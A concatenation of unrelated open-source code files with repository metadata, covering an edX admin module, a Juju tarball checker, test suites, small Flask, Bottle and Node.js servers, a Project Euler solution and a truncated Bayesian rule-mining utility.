for-isc,MSOpenTech/edx-platform,BehavioralInsightsTeam/edx-platform,unicri/edx-platform,JioEducation/edx-platform,Livit/Livit.Learn.EdX,jolyonb/edx-platform,mushtaqak/edx-platform,adoosii/edx-platform,waheedahmed/edx-platform,ahmadiga/min_edx,eestay/edx-platform,solashirai/edx-platform,Livit/Livit.Learn.EdX,ahmadio/edx-platform,philanthropy-u/edx-platform,zadgroup/edx-platform,syjeon/new_edx,cyanna/edx-platform,ahmadio/edx-platform,jazkarta/edx-platform-for-isc,nttks/jenkins-test,sameetb-cuelogic/edx-platform-test,rhndg/openedx,ovnicraft/edx-platform,TsinghuaX/edx-platform,angelapper/edx-platform,UOMx/edx-platform,vismartltd/edx-platform,waheedahmed/edx-platform,synergeticsedx/deployment-wipro,IITBinterns13/edx-platform-dev,shubhdev/openedx,jswope00/griffinx,nanolearning/edx-platform,hamzehd/edx-platform,ahmadio/edx-platform,jamesblunt/edx-platform,ahmedaljazzar/edx-platform,motion2015/edx-platform,shubhdev/edx-platform,chauhanhardik/populo_2,xuxiao19910803/edx-platform,torchingloom/edx-platform,xuxiao19910803/edx-platform,arbrandes/edx-platform,EduPepperPDTesting/pepper2013-testing,jjmiranda/edx-platform,peterm-itr/edx-platform,playm2mboy/edx-platform,peterm-itr/edx-platform,chauhanhardik/populo_2,naresh21/synergetics-edx-platform,mjirayu/sit_academy,cpennington/edx-platform,JioEducation/edx-platform,wwj718/edx-platform,analyseuc3m/ANALYSE-v1,hkawasaki/kawasaki-aio8-1,praveen-pal/edx-platform,iivic/BoiseStateX,eestay/edx-platform,kamalx/edx-platform,nanolearning/edx-platform,zadgroup/edx-platform,kamalx/edx-platform,pku9104038/edx-platform,raccoongang/edx-platform,mushtaqak/edx-platform,raccoongang/edx-platform,IONISx/edx-platform,vikas1885/test1,ak2703/edx-platform,morpheby/levelup-by,hamzehd/edx-platform,chauhanhardik/populo,ahmadio/edx-platform,shurihell/testasia,wwj718/ANALYSE,jazkarta/edx-platform,xuxiao19910803/edx-platform,procangroup/edx-platform,nanolearningllc/edx-platform-cypress,shurihell/testasia,dkarakats/edx-platform,zhenzhai/edx-platform,wwj718/ANALYSE,ahmadio/edx-platform,nttks/jenkins-test,SivilTaram/edx-platform,tanmaykm/edx-platform,romain-li/edx-platform,chauhanhardik/populo_2,procangroup/edx-platform,knehez/edx-platform,nagyistoce/edx-platform,simbs/edx-platform,peterm-itr/edx-platform,xuxiao19910803/edx-platform,appliedx/edx-platform,shubhdev/openedx,BehavioralInsightsTeam/edx-platform,J861449197/edx-platform,miptliot/edx-platform,lduarte1991/edx-platform,synergeticsedx/deployment-wipro,Lektorium-LLC/edx-platform,edx-solutions/edx-platform,franosincic/edx-platform,atsolakid/edx-platform,appliedx/edx-platform,proversity-org/edx-platform,deepsrijit1105/edx-platform,devs1991/test_edx_docmode,nikolas/edx-platform,pku9104038/edx-platform,WatanabeYasumasa/edx-platform,openfun/edx-platform,valtech-mooc/edx-platform,mjg2203/edx-platform-seas,appsembler/edx-platform,martynovp/edx-platform,hkawasaki/kawasaki-aio8-2,apigee/edx-platform,romain-li/edx-platform,shubhdev/edxOnBaadal,sudheerchintala/LearnEraPlatForm,olexiim/edx-platform,nanolearningllc/edx-platform-cypress-2,xuxiao19910803/edx,longmen21/edx-platform,iivic/BoiseStateX,zhenzhai/edx-platform,playm2mboy/edx-platform,EduPepperPDTesting/pepper2013-testing,jelugbo/tundex,mushtaqak/edx-platform,longmen21/edx-platform,wwj718/ANALYSE,cecep-edu/edx-platform,kursitet/edx-platform,TeachAtTUM/edx-platform,valtech-mooc/edx-platform,ESOedX/edx-platform,tiagochiavericosta/edx-platform,zerobatu/edx-platform,ampax/edx-platform-backup,morpheby/levelup-by,beni55/edx-platform,adoosii/edx-platform,jbassen/edx-platform,ampax/edx-platform-backup,ubc/edx-platform,pepeportela/edx-platform,jazkarta/edx-platform,Shrhawk/edx-platform,pepeportela/edx-platform,auferack08/edx-platform,ampax/edx-platform,mcgachey/edx-platform,motion2015/a3,IndonesiaX/edx-platform,knehez/edx-platform,nttks/edx-platform,ESOedX/edx-platform,cselis86/edx-platform,romain-li/edx-platform,antonve/s4-project-mooc,SravanthiSinha/edx-platform,teltek/edx-platform,jzoldak/edx-platform,praveen-pal/edx-platform,kalebhartje/schoolboost,raccoongang/edx-platform,rismalrv/edx-platform,fly19890211/edx-platform,JioEducation/edx-platform,eemirtekin/edx-platform,syjeon/new_edx,benpatterson/edx-platform,Softmotions/edx-platform,motion2015/a3,gymnasium/edx-platform,OmarIthawi/edx-platform,rue89-tech/edx-platform,pabloborrego93/edx-platform,wwj718/edx-platform,leansoft/edx-platform,kmoocdev/edx-platform,ovnicraft/edx-platform,bitifirefly/edx-platform,jswope00/griffinx,Shrhawk/edx-platform,alexthered/kienhoc-platform,zerobatu/edx-platform,edx/edx-platform,ampax/edx-platform,Softmotions/edx-platform,kmoocdev2/edx-platform,10clouds/edx-platform,mahendra-r/edx-platform,bigdatauniversity/edx-platform,pdehaye/theming-edx-platform,zofuthan/edx-platform,MakeHer/edx-platform,chand3040/cloud_that,CredoReference/edx-platform,stvstnfrd/edx-platform,pelikanchik/edx-platform,Edraak/circleci-edx-platform,mtlchun/edx,shubhdev/openedx,jbassen/edx-platform,jjmiranda/edx-platform,msegado/edx-platform,polimediaupv/edx-platform,mjirayu/sit_academy,auferack08/edx-platform,pomegranited/edx-platform,hkawasaki/kawasaki-aio8-2,DefyVentures/edx-platform,DNFcode/edx-platform,gsehub/edx-platform,stvstnfrd/edx-platform,chauhanhardik/populo,Endika/edx-platform,4eek/edx-platform,nikolas/edx-platform,zofuthan/edx-platform,motion2015/edx-platform,UXE/local-edx,vikas1885/test1,caesar2164/edx-platform,edx/edx-platform,torchingloom/edx-platform,sudheerchintala/LearnEraPlatForm,hkawasaki/kawasaki-aio8-1,dsajkl/reqiop,dsajkl/123,antoviaque/edx-platform,EduPepperPD/pepper2013,Softmotions/edx-platform,tanmaykm/edx-platform,Ayub-Khan/edx-platform,hastexo/edx-platform,dkarakats/edx-platform,pdehaye/theming-edx-platform,hmcmooc/muddx-platform,gymnasium/edx-platform,motion2015/a3,msegado/edx-platform,longmen21/edx-platform,itsjeyd/edx-platform,appsembler/edx-platform,mushtaqak/edx-platform,ahmadiga/min_edx,jelugbo/tundex,yokose-ks/edx-platform,procangroup/edx-platform,yokose-ks/edx-platform,vasyarv/edx-platform,Semi-global/edx-platform,arbrandes/edx-platform,cyanna/edx-platform,etzhou/edx-platform,motion2015/a3,sameetb-cuelogic/edx-platform-test,OmarIthawi/edx-platform,Edraak/edx-platform,shabab12/edx-platform,knehez/edx-platform,y12uc231/edx-platform,miptliot/edx-platform,kursitet/edx-platform,Semi-global/edx-platform,zerobatu/edx-platform,shubhdev/edxOnBaadal,nagyistoce/edx-platform | common/djangoapps/track/admin.py | common/djangoapps/track/admin.py | '''
django admin pages for courseware model
'''
from track.models import *
from django.contrib import admin
admin.site.register(TrackingLog)
| agpl-3.0 | Python | |
0196d9498644223959b4efae4fc084552bec8393 | Add check_tar test. | mjs/juju,mjs/juju,mjs/juju,mjs/juju,mjs/juju,mjs/juju,mjs/juju | check_tar.py | check_tar.py | #!/usr/bin/env python3
from argparse import ArgumentParser
import logging
import os
import tarfile
from textwrap import dedent
import re
import sys
class TarfileNotFound(Exception):
"""Raised when specified tarfile cannot be found."""
class TestedDirNotFound(Exception):
"""Raised when specified tested text dir cannot be found."""
def get_fpc_text(juju_tar):
"""Return the fallback-public-cloud.yaml text from a tarball.
Raises an exception if the tarfile contains more or fewer than one
falllback-public-cloud.yaml.
"""
fpc_members = [
m for m in juju_tar.getmembers()
if os.path.basename(m.name) == 'fallback-public-cloud.yaml']
if len(fpc_members) == 1:
return juju_tar.extractfile(fpc_members[0]).read()
else:
if len(fpc_members) == 0:
raise Exception('Tarfile has no fallback-public-cloud.')
else:
raise Exception(
'Tarfile {:d} copies of fallback-public-cloud.'.format(
len(fpc_members)))
def check_tar(tested_texts_dir, tar_filename):
"""Check the contents of the tarfile.
tested_texts_dir is the name of a directory with the texted
fallback-public-cloud texts.
tar_filename is the filename of the tarfile.
"""
base_tar_name = os.path.basename(tar_filename)
if re.match(r'juju-core_1\..*\.tar.gz', base_tar_name) is not None:
logging.info(
'Juju 1 does not use fallback-public-cloud.yaml. Skipping.')
return 0
try:
tf = tarfile.open(tar_filename, 'r:*')
except FileNotFoundError:
raise TarfileNotFound('Tarfile not found: "{}"'.format(tar_filename))
with tf:
fpc_text = get_fpc_text(tf)
try:
tested_list = os.listdir(tested_texts_dir)
except FileNotFoundError:
raise TestedDirNotFound(
'Tested dir not found: "{}"'.format(tested_texts_dir))
for tested in tested_list:
if tested.startswith('.'):
continue
with open(os.path.join(tested_texts_dir, tested), 'rb') as tested_file:
if tested_file.read() == fpc_text:
logging.info('fallback-public-cloud.yaml matched {}.'.format(
tested))
return 0
else:
print(
'fallback-public-cloud.yaml does not match a tested version.\n'
'Please have the QA team test it before landing.',
file=sys.stderr)
return 1
def main():
logging.basicConfig(level=logging.INFO)
parser = ArgumentParser(description=dedent("""\
Ensure fallback-public-cloud.yaml has been tested.
"""))
parser.add_argument('tested_texts_dir', help=(
'The directory containing previously-tested versions of'
' fallback-public-cloud.'))
parser.add_argument('tarfile', help='The tarfile to check.')
args = parser.parse_args()
try:
return check_tar(args.tested_texts_dir, args.tarfile)
except (TarfileNotFound, TestedDirNotFound) as e:
print(e, file=sys.stderr)
return 1
if __name__ == '__main__':
sys.exit(main())
| agpl-3.0 | Python | |
a0123aad7414ce78be6b0c984f0895bba9568c99 | Solve 50. | klen/euler | 050/solution.py | 050/solution.py | # coding: utf-8
""" Project Euler problem #50. """
import itertools as it
def problem():
u""" Solve the problem.
The prime 41, can be written as the sum of six consecutive primes:
41 = 2 + 3 + 5 + 7 + 11 + 13
This is the longest sum of consecutive primes that adds to a prime below
one-hundred.
The longest sum of consecutive primes below one-thousand that adds to a
prime, contains 21 terms, and is equal to 953.
Which prime, below one-million, can be written as the sum of the most
consecutive primes?
Answer: 997651
"""
limit = 10**6
primes = list(primes_xrange(limit))
sums = [0]
while sums[-1] < limit:
sums.append(sums[-1] + primes[len(sums) - 1])
return max(
set(a - b for b, a in it.combinations(sums[:-1], 2)) & set(primes))
def primes_xrange(a, b=0):
""" Get prime numbers below passed stop value. """
stop, start = (a, b) if not b else (b, a)
primes = [True] * stop
primes[0], primes[1] = [False, False]
for idx, value in enumerate(primes):
if value is True:
primes[idx*2::idx] = [False] * ((stop - 1)/idx - 1)
if idx >= start:
yield idx
if __name__ == '__main__':
print problem()
| mit | Python | |
e3462c036da4030886594082a563b699b296a77c | Test Pool's AddDevs(). | trgill/stratisd,stratis-storage/stratisd,trgill/stratisd,mulkieran/stratisd,stratis-storage/stratisd,stratis-storage/stratisd,stratis-storage/stratisd-client-dbus,mulkieran/stratisd | tests/dbus/pool/test_add_devs.py | tests/dbus/pool/test_add_devs.py | # Copyright 2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test adding blockdevs to a pool.
"""
import time
import unittest
from stratisd_client_dbus import Manager
from stratisd_client_dbus import Pool
from stratisd_client_dbus import StratisdErrorsGen
from stratisd_client_dbus import get_object
from stratisd_client_dbus._constants import TOP_OBJECT
from stratisd_client_dbus._implementation import PoolSpec
from .._misc import checked_call
from .._misc import _device_list
from .._misc import Service
_PN = PoolSpec.MethodNames
_DEVICE_STRATEGY = _device_list(1)
class AddDevsTestCase(unittest.TestCase):
"""
Test adding devices to a pool which is initially empty.
"""
_POOLNAME = 'deadpool'
def setUp(self):
"""
Start the stratisd daemon with the simulator.
"""
self._service = Service()
self._service.setUp()
time.sleep(1)
self._proxy = get_object(TOP_OBJECT)
self._errors = StratisdErrorsGen.get_object()
(result, _, _) = Manager.CreatePool(
self._proxy,
name=self._POOLNAME,
redundancy=0,
force=False,
devices=[]
)
self._pool_object = get_object(result)
Manager.ConfigureSimulator(self._proxy, denominator=8)
def tearDown(self):
"""
Stop the stratisd simulator and daemon.
"""
self._service.tearDown()
def testEmptyDevs(self):
"""
Adding an empty list of devs should leave the pool empty.
"""
(result, rc, _) = checked_call(
Pool.AddDevs(self._pool_object, force=False, devices=[]),
PoolSpec.OUTPUT_SIGS[_PN.AddDevs]
)
self.assertEqual(len(result), 0)
self.assertEqual(rc, self._errors.OK)
(result1, rc1, _) = checked_call(
Pool.ListDevs(self._pool_object),
PoolSpec.OUTPUT_SIGS[_PN.ListDevs]
)
self.assertEqual(rc1, self._errors.OK)
self.assertEqual(len(result1), len(result))
def testSomeDevs(self):
"""
Adding a non-empty list of devs should increase the number of devs
in the pool.
"""
(result, rc, _) = checked_call(
Pool.AddDevs(
self._pool_object,
force=False,
devices=_DEVICE_STRATEGY.example()
),
PoolSpec.OUTPUT_SIGS[_PN.AddDevs]
)
(result1, rc1, _) = checked_call(
Pool.ListDevs(self._pool_object),
PoolSpec.OUTPUT_SIGS[_PN.ListDevs]
)
self.assertEqual(rc1, self._errors.OK)
num_devices_added = len(result)
self.assertEqual(len(result1), num_devices_added)
if rc == self._errors.OK:
self.assertGreater(num_devices_added, 0)
else:
self.assertEqual(num_devices_added, 0)
| mpl-2.0 | Python | |
4e7310e8d7485e132c62c85599e2694d228e0747 | Add an example | Lothiraldan/ZeroServices | examples/chat.py | examples/chat.py | from zeroservices import BaseService
from zeroservices import ZeroMQMedium
from time import time
class ChatService(BaseService):
def __init__(self, username):
self.username = username
super(ChatService, self).__init__(ZeroMQMedium(self, port_random=True))
def service_info(self):
return {'name': self.username}
def on_event(self, message_type, message):
print "ON EVENT", message_type, message
def on_new_node(self, node_info):
print "A NEW CHALLENGER !", node_info
def coucou(self):
self.medium.publish('Hello', {'message': 'World'})
def main(self):
self.medium.ioloop.add_timeout(time() + 2, self.coucou)
super(ChatService, self).main()
if __name__ == '__main__':
import sys
s = ChatService(sys.argv[1])
s.main()
| mit | Python | |
8c4833dbf9f4ae32afbfbe6a3cb8e4630abc3d25 | Add test for local login | DannyArends/genenetwork2,DannyArends/genenetwork2,pjotrp/genenetwork2,pjotrp/genenetwork2,zsloan/genenetwork2,pjotrp/genenetwork2,DannyArends/genenetwork2,genenetwork/genenetwork2,DannyArends/genenetwork2,zsloan/genenetwork2,DannyArends/genenetwork2,genenetwork/genenetwork2,pjotrp/genenetwork2,genenetwork/genenetwork2,DannyArends/genenetwork2,genenetwork/genenetwork2,zsloan/genenetwork2,pjotrp/genenetwork2,zsloan/genenetwork2 | test/requests/test_login_local.py | test/requests/test_login_local.py | import requests
from wqflask import user_manager
from parametrized_test import ParametrizedTest
class TestLoginLocal(ParametrizedTest):
def setUp(self):
super(TestLoginLocal, self).setUp()
self.login_url = self.gn2_url +"/n/login"
data = {
"es_connection": self.es,
"email_address": "test@user.com",
"full_name": "Test User",
"organization": "Test Organisation",
"password": "test_password",
"password_confirm": "test_password"
}
user_manager.basic_info = lambda : { "basic_info": "basic" }
user_manager.RegisterUser(data)
def testLoginNonRegisteredUser(self):
data = {
"email_address": "non@existent.email",
"password": "doesitmatter?"
}
result = requests.post(self.login_url, data=data)
self.assertEqual(result.url, self.login_url, "")
def testLoginWithRegisteredUserBothRememberMeAndImportCollectionsFalse(self):
data = {
"email_address": "test@user.com",
"password": "test_password"
}
result = requests.post(self.login_url, data=data)
print("THE COOKIES? ", result.cookies)
self.assertEqual(
result.url
, self.gn2_url+"/?import_collections=false"
, "Login should have been successful")
def main(gn2, es):
import unittest
suite = unittest.TestSuite()
suite.addTest(TestLoginLocal(methodName="testLoginNonRegisteredUser", gn2_url=gn2, es_url=es))
suite.addTest(TestLoginLocal(methodName="testLoginWithRegisteredUserBothRememberMeAndImportCollectionsFalse", gn2_url=gn2, es_url=es))
runner = unittest.TextTestRunner()
runner.run(suite)
if __name__ == "__main__":
import sys
if len(sys.argv) < 3:
raise Exception("Required arguments missing")
else:
main(sys.argv[1], sys.argv[2])
| agpl-3.0 | Python | |
008711b6d5506aed60a693c296a7a01180c2ea86 | Create dss.py | harisphnx/Distributed_Sytem_Simulator-DSS_py | dss.py | dss.py | from functions import *
import multiprocessing
import time
with open("config.txt") as f:
lines = f.readlines()
max_instances = int(lines[0].split(' ')[1])
class machine():
'Class for the instance of a machine'
q = [multiprocessing.Queue() for i in range(max_instances + 1)]
# q[0] is unused
count = 1
def __init__(self):
self.mac_id = machine.count
machine.count += 1
def execute_func(self, func_name, *args):
comm_str = str(func_name) + ' = multiprocessing.Process(name = "' + str(func_name) + '", target = ' + str(func_name) + ', args = ('
comm_str += 'self,'
for arg in args:
if(type(arg) is str):
comm_str += '"' + str(arg) + '",'
else:
comm_str += str(arg) + ','
comm_str += '))'
# create the new process
exec(comm_str)
# start the new process
comm_str = str(func_name) + '.start()'
exec(comm_str)
def send(self, destination_id, message):
# send message to the machine with machine_id destination_id
mac_id = int(destination_id[8:])
if(mac_id >= machine.count or mac_id <= 0):
return -1
# message is of the format "hello|2". Meaning message is "hello" from machine with id 2
# However, the message received is processed and then returned back to the user
message += '|' + str(self.get_id())
machine.q[mac_id].put(message)
return 1
def recv(self):
mac_id = self.get_id()
if(mac_id >= machine.count or mac_id <= 0):
return -1, -1
message = machine.q[mac_id].get().split('|')
# message received is returned with the format "hello" message from "machine_2"
return message[0], 'machine_' + message[1]
def get_id(self):
return self.mac_id
def get_machine_id(self):
return "machine_" + str(self.get_id())
| mit | Python | |
c0e7393c5cc3f1095891a35b552e4a69733c83b6 | add a simple example | damoti/python-v8,damoti/python-v8,pombredanne/python-v8,damoti/python-v8,pombredanne/python-v8,pombredanne/python-v8,damoti/python-v8,pombredanne/python-v8 | demos/helloworld.py | demos/helloworld.py | #!/usr/bin/env python
from __future__ import with_statement
import PyV8
class Global(PyV8.JSClass):
def writeln(self, arg):
print arg
with PyV8.JSContext(Global()) as ctxt:
ctxt.eval("writeln('Hello World');")
| apache-2.0 | Python | |
5669960952104b811df34fa9229d7e597407c753 | add basic unit testing for appliance instances (incomplete) | dssg/wikienergy,dssg/wikienergy,dssg/wikienergy,dssg/wikienergy,dssg/wikienergy | tests/test_appliance_instance.py | tests/test_appliance_instance.py | import sys
sys.path.append('..')
import disaggregator as da
import unittest
import pandas as pd
import numpy as np
class ApplianceInstanceTestCase(unittest.TestCase):
def setUp(self):
indices = [pd.date_range('1/1/2013', periods=96, freq='15T'),
pd.date_range('1/2/2013', periods=96, freq='15T')]
data = [np.zeros(96),np.zeros(96)]
series = [pd.Series(d, index=i) for d,i in zip(data,indices)]
self.traces = [da.ApplianceTrace(s,{}) for s in series]
self.normal_instance = da.ApplianceInstance(self.traces)
def test_get_traces(self):
self.assertIsNotNone(self.normal_instance.get_traces(),
'instance should have traces')
if __name__ == "__main__":
unittest.main()
| mit | Python | |
54f7cdf15d3fdbd70a5f06ec38aa84dfd828c7e7 | Add simple gui | dorooleg/cartoon-faces | gui.py | gui.py | from tkinter import Tk, LEFT, SUNKEN, X
from tkinter.ttk import Frame, Button, Style
from PIL import Image, ImageTk
def main():
root = Tk()
root.geometry("300x300")
separator = Frame(root, height=200, relief=SUNKEN)
separator.pack(fill=X, padx=10)
s = Style()
s.configure("Visible.TButton", foreground="red", background="pink")
frame = Frame(root)
frame.pack_propagate(0)
image = Image.open("faces.jpeg")
photo = ImageTk.PhotoImage(image)
b = Button(root, image=photo, style="Visible.TButton", cursor="dot")
b.pack(side=LEFT, expand=1)
image1 = Image.open("m_bg.png")
photo1 = ImageTk.PhotoImage(image1)
b1 = Button(root, image=photo1, style="Visible.TButton", cursor="dot")
b1.pack(side=LEFT, expand=1)
image2 = Image.open("mermaid_1.jpg")
photo2 = ImageTk.PhotoImage(image2)
b2 = Button(root, image=photo2, style="Visible.TButton", cursor="dot")
b2.pack(side=LEFT, expand=1)
frame.pack(fill=X)
root.mainloop()
if __name__ == '__main__':
main()
| mit | Python | |
5af36bbe29a8a7a7418fc535c5647c9be511f0b4 | Add script to write user counts to csv. | chebee7i/twitter,chebee7i/twitter,chebee7i/twitter | scripts/userCounts.py | scripts/userCounts.py | """
Script to write user counts for each region to CSV.
"""
import twitterproj
def main():
db = twitterproj.connect()
filenames = ['grids/counties.user_counts.bot_filtered.csv',
'grids/states.user_counts.bot_filtered.csv',
'grids/squares.user_counts.bot_filtered.csv']
funcs = ['counties', 'states', 'squares']
for func, filename in zip(funcs, filenames):
# The attribute we want is twitterproj.hashtag_counts__{gridtype}
regions = getattr(twitterproj, 'hashtag_counts__' + func)()
lines = ["# count"]
for region in regions:
lines.append(str(region['user_count']))
with open(filename, 'w') as f:
f.write('\n'.join(lines))
if __name__ == '__main__':
main()
| unlicense | Python | |
fb15c992a286abe066333abfdabbb13646d383d6 | Create final_P7_Frob.py | dyzhangweix/6.00.1x-MITx | final_P7_Frob.py | final_P7_Frob.py | class Frob(object):
def __init__(self, name):
self.name = name
self.before = None
self.after = None
def setBefore(self, before):
# example: a.setBefore(b) sets b before a
self.before = before
def setAfter(self, after):
# example: a.setAfter(b) sets b after a
self.after = after
def getBefore(self):
return self.before
def getAfter(self):
return self.after
def myName(self):
return self.name
def insert(atMe, newFrob):
if atMe.myName()<newFrob.myName():
pre = atMe
while pre.getAfter()!=None and pre.getAfter().myName()<newFrob.myName():
pre=pre.getAfter()
newFrob.setAfter(pre.getAfter())
newFrob.setBefore(pre)
if pre.getAfter()!=None:
pre.getAfter().setBefore(newFrob)
pre.setAfter(newFrob)
else:
aft=atMe
while aft.getBefore()!=None and aft.getBefore().myName()>newFrob.myName():
aft=aft.getBefore()
newFrob.setAfter(aft)
newFrob.setBefore(aft.getBefore())
if aft.getBefore()!=None:
aft.getBefore().setAfter(newFrob)
aft.setBefore(newFrob)
| isc | Python | |
0c18bb0993be77059aa75015cc5433eaacbe8999 | Add barebones RFC downloader and renderer. | StefanKopieczek/rfc | rfc.py | rfc.py | import pydoc
import sys
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
def get_rfc(rfc):
url = "http://www.ietf.org/rfc/rfc{0}.txt".format(rfc)
f = urlopen(url)
data = f.read()
if isinstance(data, bytes):
data = data.decode('utf-8')
return data
def render_rfc(rfc):
pydoc.pager(get_rfc(rfc))
if __name__ == "__main__":
render_rfc(sys.argv[1])
| lgpl-2.1 | Python | |
681c21a5fbf3bc713468e33bb10dfa9bf6d62850 | Add migration to fix admin users with roles | dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq | corehq/apps/users/migrations/0004_rm_role_id_from_admins.py | corehq/apps/users/migrations/0004_rm_role_id_from_admins.py | from django.db import migrations
from corehq.apps.es import UserES
from corehq.apps.users.models import WebUser
from corehq.util.couch import DocUpdate, iter_update
from corehq.util.django_migrations import skip_on_fresh_install
from corehq.util.log import with_progress_bar
@skip_on_fresh_install
def fix_users(apps, schema_editor):
user_ids = with_progress_bar(_get_admins_with_roles())
iter_update(WebUser.get_db(), _remove_role, user_ids, verbose=True)
def _get_admins_with_roles():
# domain_memberships isn't a nested mapping in ES, so this only checks that
# they have a domain membership that's an admin, and one with a role_id,
# not that it's both on the same membership
return (UserES()
.web_users()
.term('domain_memberships.is_admin', True)
.non_null('domain_memberships.role_id')
.get_ids())
def _remove_role(user_doc):
changed = False
for dm in user_doc['domain_memberships']:
if dm['is_admin'] and dm['role_id']:
dm['role_id'] = None
changed = True
if changed:
return DocUpdate(user_doc)
class Migration(migrations.Migration):
dependencies = [
('users', '0003_roles_permissions_update'),
]
operations = [
migrations.RunPython(fix_users, reverse_code=migrations.RunPython.noop, elidable=True)
]
| bsd-3-clause | Python | |
3134e22eb5da9bd7104c199f788288e0fc823db2 | Add basic endopoints powered by bottle | ciela/chainer-gogh | app.py | app.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import bottle
from bottle import route, run, template, request, response
import os
import uuid
@route('/')
def get_simple_form():
"""
Returns simple images upload form
:return:
"""
return ('<form action="/imgs" method="post" enctype="multipart/form-data">\n'
' Input: <input name="input" type="file">\n'
' Style: <input name="style" type="file">\n'
' <input value="Upload" type="submit">\n'
'</form>')
@route('/imgs', method='POST')
def upload_imgs():
"""
Upload input & style images and return id
:return:
"""
# get files
input_img = request.files.get('input')
style_img = request.files.get('style')
if not check_img_png(input_img) or not check_img_png(style_img):
return 'File extension not allowed.'
# assign uuid
id = uuid.uuid4()
input_up_path = id.get_hex() + input_img.filename
style_up_path = id.get_hex() + style_img.filename
input_img.save(input_up_path)
style_img.save(style_up_path)
return template('Uploaded images. ID is "{{id}}".', id=id.get_hex())
def check_img_png(image):
"""
Check whether
:param image:
:return:
"""
name, ext = os.path.split(image.filename)
return ext not in ('png', 'jpeg', 'jpg')
@route('/statuses/<id>')
def show_status(id=''):
return
if __name__ == '__main__':
run(debug=True)
| mit | Python | |
07442bd7ddd07635002493bafb6ac16a24fd5d82 | Add script for http live streaming | voidabhi/node-scripts,voidabhi/node-scripts,voidabhi/node-scripts | hls.py | hls.py | var http = require('http');
var fs = require('fs');
var url = require('url');
var path = require('path');
var zlib = require('zlib');
PORT = 8000;
http.createServer(function (req, res) {
var uri = url.parse(req.url).pathname;
if (uri == '/player.html') {
res.writeHead(200, { 'Content-Type': 'text/html' });
res.write('<html><head><title>HLS Player fed by node.js' +
'</title></head><body>');
res.write('<video src="http://' + req.socket.localAddress +
':' + PORT + '/out.M3U8" controls autoplay></body></html>');
res.end();
return;
}
var filename = path.join("./", uri);
fs.exists(filename, function (exists) {
if (!exists) {
console.log('file not found: ' + filename);
res.writeHead(404, { 'Content-Type': 'text/plain' });
res.write('file not found: %s\n', filename);
res.end();
} else {
console.log('sending file: ' + filename);
switch (path.extname(uri)) {
case '.M3U8':
fs.readFile(filename, function (err, contents) {
if (err) {
res.writeHead(500);
res.end();
} else if (contents) {
res.writeHead(200,
{'Content-Type':
'application/vnd.apple.mpegurl'});
var ae = req.headers['accept-encoding'];
if (ae.match(/\bgzip\b/)) {
zlib.gzip(contents, function (err, zip) {
if (err) throw err;
res.writeHead(200,
{'content-encoding': 'gzip'});
res.end(zip);
});
} else {
res.end(contents, 'utf-8');
}
} else {
console.log('emptly playlist');
res.writeHead(500);
res.end();
}
});
break;
case '.ts':
res.writeHead(200, { 'Content-Type':
'video/MP2T' });
var stream = fs.createReadStream(filename,
{ bufferSize: 64 * 1024 });
stream.pipe(res);
break;
default:
console.log('unknown file type: ' +
path.extname(uri));
res.writeHead(500);
res.end();
}
}
});
}).listen(PORT);
| mit | Python | |
4596c0a54457ee515d164bafc399010af190eaa9 | Add basic http service to turn a led ON-OFF | andreagrandi/ledrestpi | led.py | led.py | from flask import Flask
import RPi.GPIO as GPIO
app = Flask(__name__)
@app.route("/led/on/")
def led_on():
GPIO.output(11, GPIO.HIGH)
return "Led ON"
@app.route("/led/off/")
def led_off():
GPIO.output(11, GPIO.LOW)
return "Led OFF"
if __name__ == "__main__":
GPIO.setmode(GPIO.BOARD)
GPIO.setup(11, GPIO.OUT)
app.run(host='0.0.0.0')
| mit | Python | |
95a94367a90f6424535b4120bc8e95a34624fc56 | Create util.py | wangtongada/BOA | code/util.py | code/util.py | import pandas as pd
import numpy as np
import math
from itertools import chain, combinations
import itertools
from numpy.random import random
from bisect import bisect_left
from random import sample
from scipy.stats.distributions import poisson, gamma, beta, bernoulli, binom
import time
import operator
from collections import Counter, defaultdict
from scipy.sparse import csc_matrix
def accumulate(iterable, func=operator.add):
'Return running totals'
# accumulate([1,2,3,4,5]) --> 1 3 6 10 15
# accumulate([1,2,3,4,5], operator.mul) --> 1 2 6 24 120
it = iter(iterable)
total = next(it)
yield total
for element in it:
total = func(total, element)
yield total
def find_lt(a, x):
""" Find rightmost value less than x"""
i = bisect_left(a, x)
if i:
return int(i-1)
print('in find_lt,{}'.format(a))
raise ValueError
def log_gampoiss(k,alpha,beta):
import math
k = int(k)
return math.lgamma(k+alpha)+alpha*np.log(beta)-math.lgamma(alpha)-math.lgamma(k+1)-(alpha+k)*np.log(1+beta)
def log_betabin(k,n,alpha,beta):
import math
try:
Const = math.lgamma(alpha + beta) - math.lgamma(alpha) - math.lgamma(beta)
except:
print('alpha = {}, beta = {}'.format(alpha,beta))
if isinstance(k,list) or isinstance(k,np.ndarray):
if len(k)!=len(n):
print('length of k is %d and length of n is %d'%(len(k),len(n)))
raise ValueError
lbeta = []
for ki,ni in zip(k,n):
# lbeta.append(math.lgamma(ni+1)- math.lgamma(ki+1) - math.lgamma(ni-ki+1) + math.lgamma(ki+alpha) + math.lgamma(ni-ki+beta) - math.lgamma(ni+alpha+beta) + Const)
lbeta.append(math.lgamma(ki+alpha) + math.lgamma(ni-ki+beta) - math.lgamma(ni+alpha+beta) + Const)
return np.array(lbeta)
else:
return math.lgamma(k+alpha) + math.lgamma(n-k+beta) - math.lgamma(n+alpha+beta) + Const
# return math.lgamma(n+1)- math.lgamma(k+1) - math.lgamma(n-k+1) + math.lgamma(k+alpha) + math.lgamma(n-k+beta) - math.lgamma(n+alpha+beta) + Const
def getConfusion(Yhat,Y):
if len(Yhat)!=len(Y):
raise NameError('Yhat has different length')
TP = np.dot(np.array(Y),np.array(Yhat))
FP = np.sum(Yhat) - TP
TN = len(Y) - np.sum(Y)-FP
FN = len(Yhat) - np.sum(Yhat) - TN
return TP,FP,TN,FN
def predict(rules,df):
Z = [[] for rule in rules]
dfn = 1-df #df has negative associations
